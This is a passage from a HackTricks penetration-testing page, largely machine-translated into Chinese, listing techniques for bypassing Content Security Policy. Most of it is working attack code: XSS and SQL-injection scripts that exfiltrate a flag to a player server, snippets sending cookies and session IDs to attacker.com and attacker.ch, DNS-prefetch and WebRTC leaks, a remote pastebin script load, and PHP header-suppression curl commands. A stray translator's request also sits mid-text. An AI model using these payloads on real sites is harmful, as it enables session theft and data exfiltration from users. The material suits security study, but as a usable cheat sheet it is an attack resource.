class="language-javascript"><script> fetch('http://x-oracle-v0.nn9ed.ka0labs.org/admin/search/x%27%20union%20select%20flag%20from%20challenge%23').then(_=>_.text()).then(_=>new Image().src='http://PLAYER_SERVER/?'+_) </script> </code></pre> <p>来源: <a href="https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle">https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle</a></p> <p>你也可以滥用该配置来<strong>加载插入在图片中的 javascript 代码</strong>。例如，如果页面允许从 Twitter 加载图片，你可以<strong>制作</strong>一张<strong>特殊图片</strong>、<strong>上传</strong>到 Twitter 并滥用**"unsafe-inline"<strong>来</strong>执行<strong>JS 代码（作为常规 XSS），该代码会</strong>加载<strong>该</strong>图片**，<strong>提取</strong>其中的<strong>JS</strong>并<strong>执行****它</strong>： <a href="https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/">https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/</a></p> <h3 id="with-service-workers"><a class="header" href="#with-service-workers">With Service Workers</a></h3> <p>Service Workers 的 <strong><code>importScripts</code></strong> 函数不受 CSP 限制：</p> <p><a class="content_ref" href="../xss-cross-site-scripting/abusing-service-workers.html"><span class="content_ref_label">Abusing Service Workers</span></a></p> <h3 id="策略注入"><a class="header" href="#策略注入">策略注入</a></h3> <p><strong>研究：</strong> <a href="https://portswigger.net/research/bypassing-csp-with-policy-injection"><strong>https://portswigger.net/research/bypassing-csp-with-policy-injection</strong></a></p> <h4 id="chrome"><a class="header" href="#chrome">Chrome</a></h4> <p>如果你发送的<strong>参数</strong>被<strong>粘贴进</strong>该<strong>策略</strong>的<strong>声明</strong>中，那么你可以以某种方式<strong>修改</strong>该<strong>策略</strong>使其<strong>失效</strong>。你可以通过下面任意这些绕过来<strong>允许脚本 'unsafe-inline'</strong>：</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">bash</span></div> <pre><code class="language-bash">script-src-elem *; script-src-attr * script-src-elem 'unsafe-inline'; script-src-attr 'unsafe-inline' </code></pre> <p>因为这个指令会<strong>覆盖现有的 script-src 指令</strong>。<br /> 你可以在这里找到一个例子: <a href="http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=%3Bscript-src-elem+*&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E">http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=%3Bscript-src-elem+*&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E</a></p> <h4 id="edge"><a class="header" href="#edge">Edge</a></h4> <p>在 Edge 中要简单得多。如果你能在 CSP 中添加这个：<strong><code>;_</code></strong>，<strong>Edge</strong> 会<strong>丢弃</strong>整个<strong>策略</strong>。<br /> Example: <a href="http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=;_&y=%3Cscript%3Ealert(1)%3C/script%3E">http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=;_&y=%3Cscript%3Ealert(1)%3C/script%3E</a></p> <h3 id="img-src--via-xss-iframe---时间攻击"><a class="header" href="#img-src--via-xss-iframe---时间攻击">img-src *; via XSS (iframe) - 时间攻击</a></h3> <p>注意缺少指令 <code>'unsafe-inline'</code><br /> 这次你可以通过 <strong>XSS</strong> 使用 <code><iframe</code> 让受害者<strong>加载</strong>一个由<strong>你控制</strong>的页面。这次你将让受害者访问你想从中提取信息的页面（<strong>CSRF</strong>）。你无法访问该页面的内容，但如果以某种方式你能<strong>控制页面加载所需的时间</strong>，就可以提取所需的信息。</p> <p>这次将要提取一个<strong>flag</strong>，每当通过 <strong>SQLi</strong> <strong>正确猜出一个字符</strong> 时，<strong>响应</strong> 由于 sleep 函数会花费<strong>更多时间</strong>。然后，你将能够提取该 flag:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html"> <iframe name="f" id="g"></iframe> // The bot will load an URL with the payload <script> let host = "http://x-oracle-v1.nn9ed.ka0labs.org" function gen(x) { x = escape(x.replace(/_/g, "\\_")) return `${host}/admin/search/x'union%20select(1)from%20challenge%20where%20flag%20like%20'${x}%25'and%201=sleep(0.1)%23` } function gen2(x) { x = escape(x) return `${host}/admin/search/x'union%20select(1)from%20challenge%20where%20flag='${x}'and%201=sleep(0.1)%23` } async function query(word, end = false) { let h = performance.now() f.location = end ? gen2(word) : gen(word) await new Promise((r) => { g.onload = r }) let diff = performance.now() - h return diff > 300 } let alphabet = "_abcdefghijklmnopqrstuvwxyz0123456789".split("") let postfix = "}" async function run() { let prefix = "nn9ed{" while (true) { let i = 0 for (i; i < alphabet.length; i++) { let c = alphabet[i] let t = await query(prefix + c) // Check what chars returns TRUE or FALSE console.log(prefix, c, t) if (t) { console.log("FOUND!") prefix += c break } } if (i == alphabet.length) { console.log("missing chars") break } let t = await query(prefix + "}", true) if (t) { prefix += "}" break } } new Image().src = "http://PLAYER_SERVER/?" + prefix //Exfiltrate the flag console.log(prefix) } run() </script> </code></pre> <h3 id="通过-bookmarklets"><a class="header" href="#通过-bookmarklets">通过 Bookmarklets</a></h3> <p>此攻击通常涉及一些社交工程，攻击者会<strong>说服用户将一个链接拖放到浏览器的 bookmarklet 上</strong>。该 bookmarklet 会包含<strong>恶意 javascript</strong>代码，当被 drag&dropped 或点击时会在当前 web 窗口的上下文中执行，<strong>绕过 CSP 并允许窃取敏感信息</strong>，例如 cookies 或 tokens。</p> <p>更多信息请 <a href="https://socradar.io/csp-bypass-unveiled-the-hidden-threat-of-bookmarklets/"><strong>查看原始报告</strong></a>。</p> <h3 id="通过限制-csp-绕过-csp"><a class="header" href="#通过限制-csp-绕过-csp">通过限制 CSP 绕过 CSP</a></h3> <p>在 <a href="https://github.com/google/google-ctf/tree/master/2023/web-biohazard/solution"><strong>this CTF writeup</strong></a> 中，CSP 被绕过的方法是向一个被允许的 iframe 注入更严格的 CSP，该 CSP 禁止加载某个特定的 JS 文件，随后通过 <strong>prototype pollution</strong> 或 <strong>dom clobbering</strong>，允许 <strong>滥用另一个脚本来加载任意脚本</strong>。</p> <p>你可以使用 <strong><code>csp</code></strong> 属性 <strong>限制 Iframe 的 CSP</strong>：</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html"><iframe src="https://biohazard-web.2023.ctfcompetition.com/view/[bio_id]" csp="script-src https://biohazard-web.2023.ctfcompetition.com/static/closure-library/ https://biohazard-web.2023.ctfcompetition.com/static/sanitizer.js https://biohazard-web.2023.ctfcompetition.com/static/main.js 'unsafe-inline' 'unsafe-eval'"></iframe> </code></pre> <p>在 <a href="https://github.com/aszx87410/ctf-writeups/issues/48"><strong>this CTF writeup</strong></a>，通过 <strong>HTML injection</strong> 可以对 <strong>CSP</strong> 施加更严格的限制，从而禁用了用于阻止 CSTI 的脚本，因此该 <strong>vulnerability 因而可被利用。</strong></p> <p>CSP 可以通过使用 <strong>HTML meta tags</strong> 变得更严格，内联脚本也可以通过<strong>移除</strong>允许其 <strong>nonce</strong> 的 <strong>条目</strong> 来禁用，或通过 <strong>enable specific inline script via sha</strong> 来启用特定的内联脚本：</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html"><meta http-equiv="Content-Security-Policy" content="script-src 'self' 'unsafe-eval' 'strict-dynamic' 'sha256-whKF34SmFOTPK4jfYDy03Ea8zOwJvqmz%2boz%2bCtD7RE4=' 'sha256-Tz/iYFTnNe0de6izIdG%2bo6Xitl18uZfQWapSbxHE6Ic=';" /> </code></pre> <h3 id="使用-content-security-policy-report-only-的-js-exfiltration"><a class="header" href="#使用-content-security-policy-report-only-的-js-exfiltration">使用 Content-Security-Policy-Report-Only 的 JS exfiltration</a></h3> <p>如果你能让服务器返回头部 <strong><code>Content-Security-Policy-Report-Only</code></strong>，且该头部的 <strong>值由你控制</strong>（可能因为 CRLF），你就可以让它指向你的服务器；如果你 <strong>用</strong> <strong><code><script></code></strong> 包裹你想要 exfiltrate 的 <strong>JS content</strong>，并且由于 <code>unsafe-inline</code> 很可能不被 CSP 允许，这将 <strong>触发 CSP 错误</strong>，脚本的一部分（包含敏感信息）将通过 <code>Content-Security-Policy-Report-Only</code> 发送到该服务器。</p> <p>例如，<a href="https://github.com/maple3142/My-CTF-Challenges/tree/master/TSJ%20CTF%202022/Nim%20Notes"><strong>查看此 CTF writeup</strong></a>.</p> <h3 id="cve-2020-6519"><a class="header" href="#cve-2020-6519"><a href="https://www.perimeterx.com/tech-blog/2020/csp-bypass-vuln-disclosure/">CVE-2020-6519</a></a></h3> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div> <pre><code class="language-javascript">document.querySelector("DIV").innerHTML = '<iframe src=\'javascript:var s = document.createElement("script");s.src = "https://pastebin.com/raw/dw5cWGK6";document.body.appendChild(s);\'></iframe>' </code></pre> <h3 id="leaking-信息与-csp-和-iframe"><a class="header" href="#leaking-信息与-csp-和-iframe">Leaking 信息与 CSP 和 iframe</a></h3> <ul> <li>一个 <code>iframe</code> 被创建，指向一个由 CSP 允许的 URL（称为 <code>https://example.redirect.com</code>）。</li> <li>该 URL 随后重定向到一个秘密 URL（例如 <code>https://usersecret.example2.com</code>），该 URL 被 CSP <strong>禁止</strong>。</li> <li>通过监听 <code>securitypolicyviolation</code> 事件，可以捕获 <code>blockedURI</code> 属性。该属性会暴露被阻止的 URI 的域名，从而 leaking 最初 URL 重定向到的秘密域名。</li> </ul> <p>值得注意的是，像 Chrome 和 Firefox 这样的浏览器在处理与 CSP 相关的 iframe 时行为不同，这种未定义行为可能导致敏感信息的 leakage。</p> <p>另一种技术是利用 CSP 本身来推断秘密子域。该方法依赖于 binary search 算法，并通过调整 CSP 来包含被故意阻止的特定域。例如，如果秘密子域由未知字符组成，你可以通过修改 CSP 指令来阻止或允许这些子域，从而迭代地测试不同的子域。下面是一个片段，展示如何设置 CSP 以便实现该方法：</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">markdown</span></div> <pre><code class="language-markdown">img-src https://chall.secdriven.dev https://doc-1-3213.secdrivencontent.dev https://doc-2-3213.secdrivencontent.dev ... https://doc-17-3213.secdriven.dev </code></pre> <p>通过监控哪些请求被 CSP 阻止或允许，可以缩小秘密子域中可能字符的范围，最终发现完整的 URL。</p> <p>这两种方法利用了浏览器中 CSP 实现和行为的细微差异，表明看似安全的策略可能会无意中 leak 敏感信息。</p> <p>Trick from <a href="https://ctftime.org/writeup/29310"><strong>here</strong></a>.</p> <h2 id="unsafe-technologies-to-bypass-csp"><a class="header" href="#unsafe-technologies-to-bypass-csp">Unsafe Technologies to Bypass CSP</a></h2> <h3 id="php-errors-when-too-many-params"><a class="header" href="#php-errors-when-too-many-params">PHP Errors when too many params</a></h3> <p>According to the <a href="https://www.youtube.com/watch?v=Sm4G6cAHjWM"><strong>last technique commented in this video</strong></a>, 发送过多参数（1001 GET parameters，当然也可以用 POST params 或超过 20 个文件）会触发错误。任何在 PHP web 代码中定义的 <strong><code>header()</code></strong> 都 <strong>won't be sent</strong>，因为该错误会触发。</p> <h3 id="php-response-buffer-overload"><a class="header" href="#php-response-buffer-overload">PHP response buffer overload</a></h3> <p>PHP is known for <strong>buffering the response to 4096</strong> bytes by default. 因此，如果 PHP 显示 warning，通过在 warnings 中提供 <strong>足够的数据</strong>，<strong>response</strong> 会在 <strong>CSP header</strong> 之前被 <strong>sent</strong>，导致该 header 被忽略。<br /> 然后，该技术基本上是通过 <strong>用 warnings 填满响应缓冲区</strong>，使 CSP header 不被发送。</p> <p>Idea from <a href="https://hackmd.io/@terjanq/justCTF2020-writeups#Baby-CSP-web-6-solves-406-points"><strong>this writeup</strong></a>.</p> <h3 id="kill-csp-via-max_input_vars-headers-already-sent"><a class="header" href="#kill-csp-via-max_input_vars-headers-already-sent">Kill CSP via max_input_vars (headers already sent)</a></h3> <p>Because headers must be sent before any output，PHP 发出的 warnings 会使后续的 <code>header()</code> 调用失效。如果用户输入超过 <code>max_input_vars</code>，PHP 会先抛出一个 startup warning；任何随后执行的 <code>header('Content-Security-Policy: ...')</code> 都会以 “headers already sent” 失败，从而有效地禁用 CSP，允许原本被阻止的 reflective XSS。</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">php</span></div> <pre><code class="language-php"><?php header("Content-Security-Policy: default-src 'none';"); echo $_GET['xss']; </code></pre> <p>请提供要翻译的 README.md 内容，我会按要求将相关英文翻译成中文并保留原有的 markdown/HTML 语法与链接。</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">bash</span></div> <pre><code class="language-bash"># CSP in place → payload blocked by browser curl -i "http://orange.local/?xss=<svg/onload=alert(1)>" # Exceed max_input_vars to force warnings before header() → CSP stripped curl -i "http://orange.local/?xss=<svg/onload=alert(1)>&A=1&A=2&...&A=1000" # Warning: PHP Request Startup: Input variables exceeded 1000 ... # Warning: Cannot modify header information - headers already sent </code></pre> <h3 id="重写错误页面"><a class="header" href="#重写错误页面">重写错误页面</a></h3> <p>From <a href="https://blog.ssrf.kr/69"><strong>this writeup</strong></a> 看起来可以通过加载一个错误页面（可能没有 CSP）并重写其内容来绕过 CSP 保护。</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div> <pre><code class="language-javascript">a = window.open("/" + "x".repeat(4100)) setTimeout(function () { a.document.body.innerHTML = `<img src=x onerror="fetch('https://filesharing.m0lec.one/upload/ffffffffffffffffffffffffffffffff').then(x=>x.text()).then(x=>fetch('https://enllwt2ugqrt.x.pipedream.net/'+x))">` }, 1000) </code></pre> <h3 id="some--self--wordpress"><a class="header" href="#some--self--wordpress">SOME + 'self' + wordpress</a></h3> <p>SOME 是一种利用 XSS（或高度受限的 XSS）在页面的一个 <strong>endpoint</strong> 中来滥用同一源的其他 <strong>endpoints</strong> 的技术。攻击者通过从 attacker page 加载 vulnerable endpoint，然后将 attacker page 刷新到你想滥用的 same origin 中的 real endpoint 来实现这一点。这样，<strong>vulnerable endpoint</strong> 可以在 <strong>payload</strong> 中使用 <strong><code>opener</code></strong> 对象来 <strong>访问 real endpoint 的 DOM 以进行滥用</strong>。更多信息请参见：</p> <p><a class="content_ref" href="../xss-cross-site-scripting/some-same-origin-method-execution.html"><span class="content_ref_label">SOME - Same Origin Method Execution</span></a></p> <p>此外，<strong>wordpress</strong> 在 <code>/wp-json/wp/v2/users/1?_jsonp=data</code> 有一个 <strong>JSONP</strong> endpoint，会在输出中 <strong>reflect</strong> 所发送的 <strong>data</strong>（限制为仅字母、数字和点）。</p> <p>攻击者可以滥用该 endpoint 来针对 WordPress <strong>generate a SOME attack</strong>，并将其 <strong>embed</strong> 在 <code><script s</code>rc=<code>/wp-json/wp/v2/users/1?_jsonp=some_attack></script></code> 中。请注意该 <strong>script</strong> 会被 <strong>loaded</strong>，因为它被 <strong>allowed by 'self'</strong>。此外，既然 WordPress 已安装，攻击者可能会通过 <strong>vulnerable</strong> <strong>callback</strong> endpoint 滥用 <strong>SOME attack</strong> 从而 <strong>bypass the CSP</strong>，以提升某个用户的权限、安装新插件等...<br /> 关于如何执行此攻击的更多信息，请查看 <a href="https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/">https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/</a></p> <h2 id="csp-exfiltration-bypasses"><a class="header" href="#csp-exfiltration-bypasses">CSP Exfiltration Bypasses</a></h2> <p>如果存在严格的 CSP 不允许你 <strong>interact with external servers</strong>，仍然有一些方法可以用来 exfiltrate 信息。</p> <h3 id="location"><a class="header" href="#location">Location</a></h3> <p>你可以直接更新 location，将秘密信息发送到 attacker's server：</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div> <pre><code class="language-javascript">var sessionid = document.cookie.split("=")[1] + "." document.location = "https://attacker.com/?" + sessionid </code></pre> <h3 id="meta-tag"><a class="header" href="#meta-tag">Meta tag</a></h3> <p>你可以通过注入 meta tag 进行重定向（这只是重定向，不会 leak 内容）</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html"><meta http-equiv="refresh" content="1; http://attacker.com" /> </code></pre> <h3 id="dns-prefetch"><a class="header" href="#dns-prefetch">DNS Prefetch</a></h3> <p>为了更快加载页面，浏览器会预解析主机名为 IP 地址并将其缓存以便后用.<br /> 你可以指示浏览器预解析主机名： <code><link rel="dns-prefetch" href="something.com"></code></p> <p>你可以滥用此行为来 <strong>exfiltrate sensitive information via DNS requests</strong>:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div> <pre><code class="language-javascript">var sessionid = document.cookie.split("=")[1] + "." var body = document.getElementsByTagName("body")[0] body.innerHTML = body.innerHTML + '<link rel="dns-prefetch" href="//' + sessionid + 'attacker.ch">' </code></pre> <p>另一种方法：</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div> <pre><code class="language-javascript">const linkEl = document.createElement("link") linkEl.rel = "prefetch" linkEl.href = urlWithYourPreciousData document.head.appendChild(linkEl) </code></pre> <p>为防止发生这种情况，服务器可以发送 HTTP header：</p> <pre><code>X-DNS-Prefetch-Control: off </code></pre> <div class="mdbook-alerts mdbook-alerts-tip"> <p class="mdbook-alerts-title"> <span class="mdbook-alerts-icon"></span> tip </p> <p>据称，该技术在 headless browsers (bots) 中不起作用</p> </div> <h3 id="webrtc"><a class="header" href="#webrtc">WebRTC</a></h3> <p>在多处页面上你可以看到 <strong>WebRTC 不会检查 CSP 的 <code>connect-src</code> 策略</strong>。</p> <p>实际上你可以使用 <em>DNS request</em> 来 <em>leak</em> 信息。查看以下代码：</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div> <pre><code class="language-javascript">;(async () => { p = new RTCPeerConnection({ iceServers: [{ urls: "stun:LEAK.dnsbin" }] }) p.createDataChannel("") p.setLocalDescription(await p.createOffer()) })() </code></pre> <p>另一种选择：</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div> <pre><code class="language-javascript">var pc = new RTCPeerConnection({ "iceServers":[ {"urls":[ "turn:74.125.140.127:19305?transport=udp" ],"username":"_all_your_data_belongs_to_us", "credential":"." }] }); pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp); </code></pre> <h3 id="credentialscontainer"><a class="header" href="#credentialscontainer">CredentialsContainer</a></h3> <p>凭据弹窗向 iconURL 发送 DNS 请求，不受页面限制。它仅在安全上下文 (HTTPS) 或在 localhost 上生效。</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div> <pre><code class="language-javascript">navigator.credentials.store( new FederatedCredential({ id:"satoki", name:"satoki", provider:"https:"+your_data+"example.com", iconURL:"https:"+your_data+"example.com" }) ) </code></pre> <h2 id="在线检查-csp-策略"><a class="header" href="#在线检查-csp-策略">在线检查 CSP 策略</a></h2> <ul> <li><a href="https://csp-evaluator.withgoogle.com">https://csp-evaluator.withgoogle.com/</a></li> <li><a href="https://cspvalidator.org/#url=https://cspvalidator.org/">https://cspvalidator.org/</a></li> </ul> <h2 id="自动生成-csp"><a class="header" href="#自动生成-csp">自动生成 CSP</a></h2> <p><a href="https://csper.io/docs/generating-content-security-policy">https://csper.io/docs/generating-content-security-policy</a></p> <h2 id="参考资料"><a class="header" href="#参考资料">参考资料</a></h2> <ul> <li><a href="https://hackdefense.com/publications/csp-the-how-and-why-of-a-content-security-policy/">https://hackdefense.com/publications/csp-the-how-and-why-of-a-content-security-policy/</a></li> <li><a href="https://lcamtuf.coredump.cx/postxss/">https://lcamtuf.coredump.cx/postxss/</a></li> <li><a href="https://bhavesh-thakur.medium.com/content-security-policy-csp-bypass-techniques-e3fa475bfe5d">https://bhavesh-thakur.medium.com/content-security-policy-csp-bypass-techniques-e3fa475bfe5d</a></li> <li><a href="https://0xn3va.gitbook.io/cheat-sheets/web-application/content-security-policy#allowed-data-scheme">https://0xn3va.gitbook.io/cheat-sheets/web-application/content-security-policy#allowed-data-scheme</a></li> <li><a href="https://www.youtube.com/watch?v=MCyPuOWs3dg">https://www.youtube.com/watch?v=MCyPuOWs3dg</a></li> <li><a href="https://aszx87410.github.io/beyond-xss/en/ch2/csp-bypass/">https://aszx87410.github.io/beyond-xss/en/ch2/csp-bypass/</a></li> <li><a href="https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/">https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/</a></li> <li><a href="https://cside.dev/blog/weaponized-google-oauth-triggers-malicious-websocket">https://cside.dev/blog/weaponized-google-oauth-triggers-malicious-websocket</a></li> <li><a href="https://blog.orange.tw/posts/2025-08-the-art-of-php-ch/">The Art of PHP: CTF‑born exploits and techniques</a></li> </ul> <p></p> <div class="mdbook-alerts mdbook-alerts-tip"> <p class="mdbook-alerts-title"> <span class="mdbook-alerts-icon"></span> tip </p> <p>学习和实践 AWS 黑客技术：<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"><a href="https://training.hacktricks.xyz/courses/arte"><strong>HackTricks Training AWS Red Team Expert (ARTE)</strong></a><img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"><br /> 学习和实践 GCP 黑客技术：<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"><a href="https://training.hacktricks.xyz/courses/grte"><strong>HackTricks Training GCP Red Team Expert (GRTE)</strong></a><img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"> 学习和实践 Azure 黑客技术：<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"><a href="https://training.hacktricks.xyz/courses/azrte"><strong>HackTricks Training Azure Red Team Expert (AzRTE)</strong></a><img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"></p> <details> <summary>支持 HackTricks</summary> <ul> <li>查看 <a href="https://github.com/sponsors/carlospolop"><strong>订阅计划</strong></a>!</li> <li><strong>加入</strong> 💬 <a href="https://discord.gg/hRep4RUj7f"><strong>Discord 群组</strong></a> 或 <a href="https://t.me/peass"><strong>Telegram 群组</strong></a> 或 <strong>在</strong> <strong>Twitter</strong> 🐦 <strong>上关注我们</strong> <a href="https://twitter.com/hacktricks_live"><strong>@hacktricks_live</strong></a><strong>.</strong></li> <li><strong>通过向</strong> <a href="https://github.com/carlospolop/hacktricks"><strong>HackTricks</strong></a> 和 <a href="https://github.com/carlospolop/hacktricks-cloud"><strong>HackTricks Cloud</strong></a> GitHub 仓库提交 PR 来分享黑客技巧。</li> </ul> </details> </div> </main> <nav class="nav-wrapper" aria-label="Page navigation">  <a rel="prev" href="../../pentesting-web/command-injection.html" class="mobile-nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left"> <i class="fa fa-angle-left"></i> </a> <a rel="next prefetch" href="../../pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.html" class="mobile-nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right"> <i class="fa fa-angle-right"></i> </a> <div style="clear: both"></div> </nav> <nav class="nav-wide-wrapper" aria-label="Page navigation"> <a rel="prev" href="../../pentesting-web/command-injection.html" class="nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left"> <i class="fa fa-angle-left"></i><span style="font-size: medium; align-self: center; margin-left: 10px;">Command Injection</span> </a> <a rel="next prefetch" href="../../pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.html" class="nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right"> <span style="font-size: medium; align-self: center; margin-right: 10px;">CSP bypass: self + 'unsafe-inline' with Iframes</span><i class="fa fa-angle-right"></i> </a> </nav> </div> <div class="sidetoc"> <div class="sidetoc-wrapper"> <nav class="pagetoc"></nav> <a class="sidesponsor" href="" target="_blank"> <img src="" alt="" srcset=""> <div class="sponsor-title"> </div> <div class="sponsor-description"> </div> <div class="sponsor-cta"></div> </a> </div> </div> </div> <div class="footer"> <div id="theme-wrapper" class="theme-wrapper"> <div id="theme-btns" class="theme-btns"> <button id="hacktricks-light" type="button" role="radio" aria-label="Switch to light theme" aria-checked="false" class="theme"> <i class="fa fa-sun-o"></i> </button> <button id="hacktricks-dark" type="button" role="radio" aria-label="Switch to dark theme" aria-checked="false" class="theme theme-selected"> <i class="fa fa-moon-o"></i> </button> </div> </div> </div> </div> </div> <script> window.playground_copyable = true; </script> <script src="../../elasticlunr.min.js"></script> <script src="../../mark.min.js"></script>  <script src="../../clipboard.min.js"></script> <script src="../../highlight.js"></script> <script src="../../book.js"></script>  <script src="../../theme/pagetoc.js"></script> <script src="../../theme/tabs.js"></script> <script src="../../theme/ht_searcher.js"></script> <script src="../../theme/sponsor.js"></script> <script src="../../theme/ai.js"></script>  <script defer src="https://www.fairanalytics.de/pixel/deXeO7BNBrMuhdG1"></script> </div> </body> </html>